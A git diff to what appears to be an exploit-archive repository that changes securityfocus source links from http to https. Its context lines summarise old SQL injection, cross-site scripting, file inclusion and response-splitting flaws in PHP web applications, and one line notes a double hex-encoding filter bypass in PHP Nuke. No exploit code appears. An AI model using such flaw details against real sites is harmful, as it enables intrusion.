diff --git a/exploits/php/webapps/25467.txt b/exploits/php/webapps/25467.txt index 146ec1d74..3c3ed298f 100644 --- a/exploits/php/webapps/25467.txt +++ b/exploits/php/webapps/25467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13275/info +source: https://www.securityfocus.com/bid/13275/info A remote PHP script injection vulnerability affects Netref. This issue is due to a failure of the application to sanitize user-supplied data. diff --git a/exploits/php/webapps/25468.txt b/exploits/php/webapps/25468.txt index b62c9581e..8c883752d 100644 --- a/exploits/php/webapps/25468.txt +++ b/exploits/php/webapps/25468.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13276/info +source: https://www.securityfocus.com/bid/13276/info PHP Labs proFile is prone to a cross-site scripting vulnerability. As a result, attackers may embed hostile HTML and script code in a malicious link to the affected application. If the link is followed, the code may be rendered by the victim's browser in the context of the vulnerable site. diff --git a/exploits/php/webapps/25469.txt b/exploits/php/webapps/25469.txt index fbbfeae37..0c7dfff8e 100644 --- a/exploits/php/webapps/25469.txt +++ b/exploits/php/webapps/25469.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13279/info +source: https://www.securityfocus.com/bid/13279/info Ocean12 Calendar Manager is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25473.txt b/exploits/php/webapps/25473.txt index 2a9b894a8..af930e15a 100644 --- a/exploits/php/webapps/25473.txt +++ b/exploits/php/webapps/25473.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13282/info +source: https://www.securityfocus.com/bid/13282/info PHP Labs proFile is prone to a cross-site scripting vulnerability. As a result, attackers may embed hostile HTML and script code in a malicious link to the affected application. If the link is followed, the code may be rendered by the victim's browser in the context of the vulnerable site. diff --git a/exploits/php/webapps/25474.txt b/exploits/php/webapps/25474.txt index cf95baf35..ee8779217 100644 --- a/exploits/php/webapps/25474.txt +++ b/exploits/php/webapps/25474.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13283/info +source: https://www.securityfocus.com/bid/13283/info phpbb-auction module is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25475.txt b/exploits/php/webapps/25475.txt index dc95966d4..0f9aabb73 100644 --- a/exploits/php/webapps/25475.txt +++ b/exploits/php/webapps/25475.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13284/info +source: https://www.securityfocus.com/bid/13284/info phpbb-auction module is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25488.txt b/exploits/php/webapps/25488.txt index cd99a9542..be4431f0d 100644 --- a/exploits/php/webapps/25488.txt +++ b/exploits/php/webapps/25488.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13299/info +source: https://www.securityfocus.com/bid/13299/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25489.txt b/exploits/php/webapps/25489.txt index 88670d37b..79065d145 100644 
--- a/exploits/php/webapps/25489.txt +++ b/exploits/php/webapps/25489.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13303/info +source: https://www.securityfocus.com/bid/13303/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25490.txt b/exploits/php/webapps/25490.txt index a5acaff69..35fd7ef30 100644 --- a/exploits/php/webapps/25490.txt +++ b/exploits/php/webapps/25490.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13305/info +source: https://www.securityfocus.com/bid/13305/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25491.txt b/exploits/php/webapps/25491.txt index d45eb1798..f6930eb1a 100644 --- a/exploits/php/webapps/25491.txt +++ b/exploits/php/webapps/25491.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13306/info +source: https://www.securityfocus.com/bid/13306/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25492.txt b/exploits/php/webapps/25492.txt index 2b887be89..a1dcea3a8 100644 --- a/exploits/php/webapps/25492.txt +++ b/exploits/php/webapps/25492.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13307/info +source: https://www.securityfocus.com/bid/13307/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25494.txt b/exploits/php/webapps/25494.txt index 5dca657e5..fa287d475 100644 --- a/exploits/php/webapps/25494.txt +++ b/exploits/php/webapps/25494.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13308/info +source: https://www.securityfocus.com/bid/13308/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25495.txt b/exploits/php/webapps/25495.txt index 1a816f97d..47812946e 100644 --- a/exploits/php/webapps/25495.txt +++ b/exploits/php/webapps/25495.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13309/info +source: https://www.securityfocus.com/bid/13309/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25503.txt b/exploits/php/webapps/25503.txt index 6690b74d7..394f8985a 100644 --- a/exploits/php/webapps/25503.txt +++ b/exploits/php/webapps/25503.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13325/info +source: https://www.securityfocus.com/bid/13325/info WoltLab Burning Board is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25523.txt b/exploits/php/webapps/25523.txt index f5d2b83c8..40f9aac59 100644 --- a/exploits/php/webapps/25523.txt +++ b/exploits/php/webapps/25523.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13344/info +source: https://www.securityfocus.com/bid/13344/info phpBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25524.txt b/exploits/php/webapps/25524.txt index 69addbc9d..7aaaf5348 100644 --- a/exploits/php/webapps/25524.txt +++ b/exploits/php/webapps/25524.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13345/info +source: https://www.securityfocus.com/bid/13345/info phpBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25528.txt b/exploits/php/webapps/25528.txt index 83f58a607..710d06445 100644 --- a/exploits/php/webapps/25528.txt +++ b/exploits/php/webapps/25528.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13353/info +source: https://www.securityfocus.com/bid/13353/info WoltLab Burning Board is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25531.html b/exploits/php/webapps/25531.html index d287e5e41..99c8be80d 100644 --- a/exploits/php/webapps/25531.html +++ b/exploits/php/webapps/25531.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13370/info +source: https://www.securityfocus.com/bid/13370/info phpMyVisites allows attackers to include arbitrary files. While it has been demonstrated that local files may be included through this vulnerability, there is an unconfirmed possibility of remote file inclusion. diff --git a/exploits/php/webapps/25532.txt b/exploits/php/webapps/25532.txt index ca868e0fb..2d6035c62 100644 --- a/exploits/php/webapps/25532.txt +++ b/exploits/php/webapps/25532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13371/info +source: https://www.securityfocus.com/bid/13371/info yappa-ng is prone to a remote file include vulnerability. This issue may let remote attackers include and execute malicious remote PHP scripts. diff --git a/exploits/php/webapps/25533.txt b/exploits/php/webapps/25533.txt index a6164cd4b..798e1c7fb 100644 --- a/exploits/php/webapps/25533.txt +++ b/exploits/php/webapps/25533.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13372/info +source: https://www.securityfocus.com/bid/13372/info yappa-ng is prone to an unspecified cross-site scripting vulnerability. This issue may allow for theft of cookie-based authentication credentials or other attacks. diff --git a/exploits/php/webapps/25534.txt b/exploits/php/webapps/25534.txt index 7d5dafdf0..9dcee4490 100644 --- a/exploits/php/webapps/25534.txt +++ b/exploits/php/webapps/25534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13374/info +source: https://www.securityfocus.com/bid/13374/info SQWebmail is prone to a HTTP response splitting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25535.txt b/exploits/php/webapps/25535.txt index e9f431835..f8572993e 100644 --- a/exploits/php/webapps/25535.txt +++ b/exploits/php/webapps/25535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13375/info +source: https://www.securityfocus.com/bid/13375/info Invision Power Board is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25538.txt b/exploits/php/webapps/25538.txt index 124b5241c..a34c87e13 100644 --- a/exploits/php/webapps/25538.txt +++ b/exploits/php/webapps/25538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13381/info +source: https://www.securityfocus.com/bid/13381/info GrayCMS is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25545.txt b/exploits/php/webapps/25545.txt index f2af52116..6eb52aded 100644 --- a/exploits/php/webapps/25545.txt +++ b/exploits/php/webapps/25545.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13398/info +source: https://www.securityfocus.com/bid/13398/info bBlog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25548.txt b/exploits/php/webapps/25548.txt index 26bf6fc83..2c01fdce8 100644 --- a/exploits/php/webapps/25548.txt +++ b/exploits/php/webapps/25548.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13406/info +source: https://www.securityfocus.com/bid/13406/info PHPCart is prone to a remote input validation vulnerability. The issue exists because the software fails to sufficiently sanitize URI parameter data that is employed when computing product charges. diff --git a/exploits/php/webapps/25549.txt b/exploits/php/webapps/25549.txt index ec643f2ad..8ea79b910 100644 --- a/exploits/php/webapps/25549.txt +++ b/exploits/php/webapps/25549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13407/info +source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application functionality such as database interaction and generating dynamic Web content. diff --git a/exploits/php/webapps/25550.txt b/exploits/php/webapps/25550.txt index 5671c5f29..b34a6ca50 100644 --- a/exploits/php/webapps/25550.txt +++ b/exploits/php/webapps/25550.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13407/info +source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application functionality such as database interaction and generating dynamic Web content. diff --git a/exploits/php/webapps/25551.txt b/exploits/php/webapps/25551.txt index c6cf16dfc..3c207d72e 100644 --- a/exploits/php/webapps/25551.txt +++ b/exploits/php/webapps/25551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13407/info +source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application functionality such as database interaction and generating dynamic Web content. diff --git a/exploits/php/webapps/25552.txt b/exploits/php/webapps/25552.txt index 378a6bb4d..d878b3300 100644 --- a/exploits/php/webapps/25552.txt +++ b/exploits/php/webapps/25552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13407/info +source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application functionality such as database interaction and generating dynamic Web content. diff --git a/exploits/php/webapps/25553.txt b/exploits/php/webapps/25553.txt index d039b137d..b99fc64bc 100644 --- a/exploits/php/webapps/25553.txt +++ b/exploits/php/webapps/25553.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13407/info +source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application functionality such as database interaction and generating dynamic Web content. diff --git a/exploits/php/webapps/25555.txt b/exploits/php/webapps/25555.txt index 638a51af5..b80c7b265 100644 --- a/exploits/php/webapps/25555.txt +++ b/exploits/php/webapps/25555.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13412/info +source: https://www.securityfocus.com/bid/13412/info Koobi CMS is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25556.txt b/exploits/php/webapps/25556.txt index 75dd655fa..e47cb1e1e 100644 --- a/exploits/php/webapps/25556.txt +++ b/exploits/php/webapps/25556.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13413/info +source: https://www.securityfocus.com/bid/13413/info Koobi CMS is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25558.txt b/exploits/php/webapps/25558.txt index 22d3dfab7..7a78b9461 100644 --- a/exploits/php/webapps/25558.txt +++ b/exploits/php/webapps/25558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13417/info +source: https://www.securityfocus.com/bid/13417/info The notes module for phpBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 
diff --git a/exploits/php/webapps/25560.txt b/exploits/php/webapps/25560.txt index 69d9573c6..6abc9268c 100644 --- a/exploits/php/webapps/25560.txt +++ b/exploits/php/webapps/25560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13419/info +source: https://www.securityfocus.com/bid/13419/info Amazon Webstore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25564.txt b/exploits/php/webapps/25564.txt index 04f0dbabc..dc6c19288 100644 --- a/exploits/php/webapps/25564.txt +++ b/exploits/php/webapps/25564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13425/info +source: https://www.securityfocus.com/bid/13425/info Amazon Webstore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25565.txt b/exploits/php/webapps/25565.txt index 96a0f08c9..a6713b12e 100644 --- a/exploits/php/webapps/25565.txt +++ b/exploits/php/webapps/25565.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13426/info +source: https://www.securityfocus.com/bid/13426/info Amazon Webstore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25566.txt b/exploits/php/webapps/25566.txt index 59208f84f..949457d91 100644 --- a/exploits/php/webapps/25566.txt +++ b/exploits/php/webapps/25566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13427/info +source: https://www.securityfocus.com/bid/13427/info Amazon Webstore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25567.txt b/exploits/php/webapps/25567.txt index 0ab1c24aa..e64b4474b 100644 
--- a/exploits/php/webapps/25567.txt +++ b/exploits/php/webapps/25567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13428/info +source: https://www.securityfocus.com/bid/13428/info Amazon Webstore is prone to a HTTP response splitting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25568.txt b/exploits/php/webapps/25568.txt index 62b3fa1ff..3d59926f2 100644 --- a/exploits/php/webapps/25568.txt +++ b/exploits/php/webapps/25568.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13433/info +source: https://www.securityfocus.com/bid/13433/info PHPCoin is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25569.txt b/exploits/php/webapps/25569.txt index c2140e8f7..970239438 100644 --- a/exploits/php/webapps/25569.txt +++ b/exploits/php/webapps/25569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13433/info +source: https://www.securityfocus.com/bid/13433/info PHPCoin is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25570.txt b/exploits/php/webapps/25570.txt index 0525ab5fb..ccbe404d9 100644 --- a/exploits/php/webapps/25570.txt +++ b/exploits/php/webapps/25570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13451/info +source: https://www.securityfocus.com/bid/13451/info JGS-Portal is prone to an SQL injection. This issue may potentially be exploited to compromise the software or gain unauthorized access to the database. diff --git a/exploits/php/webapps/25575.txt b/exploits/php/webapps/25575.txt index 862aed9f3..3529178c3 100644 --- a/exploits/php/webapps/25575.txt 
+++ b/exploits/php/webapps/25575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13462/info +source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25576.txt b/exploits/php/webapps/25576.txt index cfdc50784..3cf0871f2 100644 --- a/exploits/php/webapps/25576.txt +++ b/exploits/php/webapps/25576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13462/info +source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25577.txt b/exploits/php/webapps/25577.txt index 24ca7385b..75aacd606 100644 --- a/exploits/php/webapps/25577.txt +++ b/exploits/php/webapps/25577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13462/info +source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25578.txt b/exploits/php/webapps/25578.txt index 0760b1888..eed0183cb 100644 --- a/exploits/php/webapps/25578.txt +++ b/exploits/php/webapps/25578.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13462/info +source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25579.txt b/exploits/php/webapps/25579.txt index 4cfc063ef..369017765 100644 --- a/exploits/php/webapps/25579.txt +++ b/exploits/php/webapps/25579.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13462/info +source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25580.txt b/exploits/php/webapps/25580.txt index 2b6898e4c..4132431a8 100644 --- a/exploits/php/webapps/25580.txt +++ b/exploits/php/webapps/25580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13462/info +source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25590.txt b/exploits/php/webapps/25590.txt index db99774e6..c8fb162ee 100644 --- a/exploits/php/webapps/25590.txt +++ b/exploits/php/webapps/25590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13478/info +source: https://www.securityfocus.com/bid/13478/info osTicket is affected by multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/25591.txt b/exploits/php/webapps/25591.txt index 91b695762..e58aea11d 100644 --- a/exploits/php/webapps/25591.txt +++ b/exploits/php/webapps/25591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13481/info +source: https://www.securityfocus.com/bid/13481/info SitePanel2 is affected by multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25593.txt b/exploits/php/webapps/25593.txt index 16e3dcfc3..611123571 100644 --- a/exploits/php/webapps/25593.txt +++ b/exploits/php/webapps/25593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13483/info +source: https://www.securityfocus.com/bid/13483/info Invision Power Board is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25599.txt b/exploits/php/webapps/25599.txt index ebff965c8..51915dbbb 100644 --- a/exploits/php/webapps/25599.txt +++ b/exploits/php/webapps/25599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13493/info +source: https://www.securityfocus.com/bid/13493/info Interspire ArticleLive is reportedly prone to multiple vulnerabilities. These issues may allow a remote attacker to gain administrative access to the application and carry out various cross-site scripting attacks. diff --git a/exploits/php/webapps/25601.txt b/exploits/php/webapps/25601.txt index 1f54cc276..578a160ae 100644 --- a/exploits/php/webapps/25601.txt +++ b/exploits/php/webapps/25601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13499/info +source: https://www.securityfocus.com/bid/13499/info FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/25602.txt b/exploits/php/webapps/25602.txt index b5c18005f..dc282829a 100644 --- a/exploits/php/webapps/25602.txt +++ b/exploits/php/webapps/25602.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13499/info +source: https://www.securityfocus.com/bid/13499/info FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25603.txt b/exploits/php/webapps/25603.txt index 2441d86bd..33a652edf 100644 --- a/exploits/php/webapps/25603.txt +++ b/exploits/php/webapps/25603.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13499/info +source: https://www.securityfocus.com/bid/13499/info FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25604.txt b/exploits/php/webapps/25604.txt index 8f1f54e78..f3ac94383 100644 --- a/exploits/php/webapps/25604.txt +++ b/exploits/php/webapps/25604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13499/info +source: https://www.securityfocus.com/bid/13499/info FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25612.txt b/exploits/php/webapps/25612.txt index 398775e71..9e1e26d1a 100644 --- a/exploits/php/webapps/25612.txt +++ b/exploits/php/webapps/25612.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13507/info +source: https://www.securityfocus.com/bid/13507/info myBloggie is affected by multiple vulnerabilities. diff --git a/exploits/php/webapps/25614.txt b/exploits/php/webapps/25614.txt index d0f270e21..0d0547931 100644 --- a/exploits/php/webapps/25614.txt +++ b/exploits/php/webapps/25614.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13512/info +source: https://www.securityfocus.com/bid/13512/info MidiCart PHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25615.txt b/exploits/php/webapps/25615.txt index d8bb61a00..f35a8f188 100644 --- a/exploits/php/webapps/25615.txt +++ b/exploits/php/webapps/25615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13513/info +source: https://www.securityfocus.com/bid/13513/info MidiCart PHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25616.txt b/exploits/php/webapps/25616.txt index 4a23f3877..7018e1d91 100644 --- a/exploits/php/webapps/25616.txt +++ b/exploits/php/webapps/25616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13514/info +source: https://www.securityfocus.com/bid/13514/info MidiCart PHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25617.txt b/exploits/php/webapps/25617.txt index 6e79301ff..f77007424 100644 --- a/exploits/php/webapps/25617.txt +++ b/exploits/php/webapps/25617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13515/info +source: https://www.securityfocus.com/bid/13515/info MidiCart PHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25618.txt b/exploits/php/webapps/25618.txt index c986df7f5..c38db8e8b 100644 --- a/exploits/php/webapps/25618.txt +++ b/exploits/php/webapps/25618.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13516/info +source: https://www.securityfocus.com/bid/13516/info MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25619.txt b/exploits/php/webapps/25619.txt index e4c68ffd3..e05a9cab0 100644 --- a/exploits/php/webapps/25619.txt +++ b/exploits/php/webapps/25619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13517/info +source: https://www.securityfocus.com/bid/13517/info MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25620.txt b/exploits/php/webapps/25620.txt index db4f86a52..dd6279e82 100644 --- a/exploits/php/webapps/25620.txt +++ b/exploits/php/webapps/25620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13518/info +source: https://www.securityfocus.com/bid/13518/info MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25623.txt b/exploits/php/webapps/25623.txt index 3af49b1eb..d8f007827 100644 --- a/exploits/php/webapps/25623.txt +++ b/exploits/php/webapps/25623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13533/info +source: https://www.securityfocus.com/bid/13533/info CJ Ultra Plus is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25630.txt b/exploits/php/webapps/25630.txt index a219d1ba2..5a00d417c 100644 --- a/exploits/php/webapps/25630.txt +++ b/exploits/php/webapps/25630.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13548/info +source: https://www.securityfocus.com/bid/13548/info Advanced Guestbook is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25635.txt b/exploits/php/webapps/25635.txt index a37d880c8..fff5521f3 100644 --- a/exploits/php/webapps/25635.txt +++ b/exploits/php/webapps/25635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13557/info +source: https://www.securityfocus.com/bid/13557/info PHP Nuke is prone to an input validation vulnerability. Reports indicate the script fails to correctly identify potentially dangerous characters when the characters are double hex-encoded (i.e. %25%41 == %41 == A). diff --git a/exploits/php/webapps/25637.txt b/exploits/php/webapps/25637.txt index 3925fd05a..ba6e03e47 100644 --- a/exploits/php/webapps/25637.txt +++ b/exploits/php/webapps/25637.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13560/info +source: https://www.securityfocus.com/bid/13560/info CodeThatShoppingCart is reportedly affected by multiple input validation vulnerabilities. These issues may allow remote attackers to carry out cross-site scripting and SQL injection attacks. An attacker may also potentially disclose sensitive data. diff --git a/exploits/php/webapps/25638.txt b/exploits/php/webapps/25638.txt index 99ac9203a..1609596b3 100644 --- a/exploits/php/webapps/25638.txt +++ b/exploits/php/webapps/25638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13560/info +source: https://www.securityfocus.com/bid/13560/info CodeThatShoppingCart is reportedly affected by multiple input validation vulnerabilities. These issues may allow remote attackers to carry out cross-site scripting and SQL injection attacks. An attacker may also potentially disclose sensitive data. 
